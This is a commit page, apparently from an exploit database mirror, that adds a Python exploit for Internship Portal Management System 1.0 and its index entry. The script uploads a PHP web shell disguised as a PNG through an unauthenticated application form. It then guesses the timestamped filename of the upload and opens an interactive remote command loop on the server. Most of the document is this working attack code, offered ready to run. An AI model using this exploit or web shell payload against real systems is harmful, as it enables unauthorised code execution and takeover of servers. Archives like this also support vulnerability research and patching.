DB: 2021-05-05
1 changes to exploits/shellcodes Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
This commit is contained in:
parent
dcd1229758
commit
b8cf9ea0fc
2 changed files with 75 additions and 0 deletions
74
exploits/php/webapps/49823.py
Executable file
74
exploits/php/webapps/49823.py
Executable file
|
@ -0,0 +1,74 @@
|
||||||
|
# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
|
||||||
|
# Date: 2021-05-04
|
||||||
|
# Exploit Author: argenestel
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
|
||||||
|
# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Debian 10
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import time
|
||||||
|
|
||||||
|
#change the url to the site running the vulnerable system
|
||||||
|
url="http://127.0.0.1:4000"
|
||||||
|
#burp proxy
|
||||||
|
proxies = {
|
||||||
|
"http": "http://127.0.0.1:8080",
|
||||||
|
}
|
||||||
|
#payload
|
||||||
|
payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
|
||||||
|
|
||||||
|
#the upload point
|
||||||
|
insert_url=url+"/inserty.php"
|
||||||
|
|
||||||
|
def fill_details():
|
||||||
|
global payload
|
||||||
|
global shellend
|
||||||
|
global shellstart
|
||||||
|
print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
|
||||||
|
#time start
|
||||||
|
shellstart=int(time.time())
|
||||||
|
#print(shellstart)
|
||||||
|
files = {'file':('shell.php',payload,
|
||||||
|
'image/png', {'Content-Disposition': 'form-data'}
|
||||||
|
)
|
||||||
|
}
|
||||||
|
data = {
|
||||||
|
"company_name":"some",
|
||||||
|
"first_name":"some",
|
||||||
|
"last_name":"some",
|
||||||
|
"email":"some@some.com",
|
||||||
|
"gender":"Male",
|
||||||
|
"insert_button":"Apply",
|
||||||
|
"terms":"on"
|
||||||
|
}
|
||||||
|
r = requests.post(insert_url, data=data, files=files)
|
||||||
|
if r.status_code == 200:
|
||||||
|
print("Exploited Intern System Successfully...")
|
||||||
|
shellend = int(time.time())
|
||||||
|
#print(shellend)
|
||||||
|
shell()
|
||||||
|
else:
|
||||||
|
print("Exploit Failed")
|
||||||
|
|
||||||
|
def shell():
|
||||||
|
for shellname in range(shellstart, shellend+1):
|
||||||
|
shellstr=str(shellname)
|
||||||
|
shell_url=url+"/upload/"+shellstr+"_shell.php"
|
||||||
|
r = requests.get(shell_url)
|
||||||
|
if r.status_code == 200:
|
||||||
|
shell_url=url+"/upload/"+shellstr+"_shell.php"
|
||||||
|
break
|
||||||
|
|
||||||
|
r = requests.get(shell_url)
|
||||||
|
if r.status_code == 200:
|
||||||
|
print("Shell Starting...")
|
||||||
|
while True:
|
||||||
|
cmd=input("cmd$ ")
|
||||||
|
r = requests.get(shell_url+"?cmd="+cmd)
|
||||||
|
print(r.text)
|
||||||
|
else:
|
||||||
|
print("File Name Error")
|
||||||
|
|
||||||
|
|
||||||
|
fill_details()
|
|
@ -43990,3 +43990,4 @@ id,file,description,date,author,type,platform,port
|
||||||
49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,
|
49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,
|
||||||
49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
|
49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
|
||||||
49822,exploits/ruby/webapps/49822.rb,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
|
49822,exploits/ruby/webapps/49822.rb,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
|
||||||
|
49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)",2021-05-04,argenestel,webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue